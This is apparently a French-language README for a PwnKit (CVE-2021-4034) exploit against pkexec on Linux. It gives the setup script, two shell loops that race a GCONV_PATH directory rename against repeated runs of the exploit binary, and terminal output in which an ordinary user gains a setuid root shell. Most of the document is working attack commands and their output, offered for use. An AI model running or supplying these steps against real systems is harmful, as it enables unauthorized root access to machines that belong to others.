
Exploit pour CVE-2021-4034 (PwnKit) qui exploite une condition de course dans pkexec pour élever les privilèges à root sur les systèmes Linux.
Exploit pour la vulnérabilité pwnkit de l'équipe Qualys.
Cet exploit suppose que gcc est présent sur la machine cible.
$ id
uid=1001(ayrx) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
$ ./setup.sh
Exécutez la commande suivante dans une session bash :
while :; do mv "GCONV_PATH=./value" "GCONV_PATH=./value.bak"; mv "GCONV_PATH=./value.bak" "GCONV_PATH=./value"; done
Exécutez la commande suivante dans une autre session bash :
while :; do ./exploit; done
Vous finirez par gagner la course et obtenir un binaire shell qui vous donne
un accès root :
$ ls -lah shell
-rwsrwxrwx 1 root ayrx 16K Jan 26 08:57 shell
$ ./shell
# id
uid=0(root) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
Un court article sur la technique est disponible sur mon blog.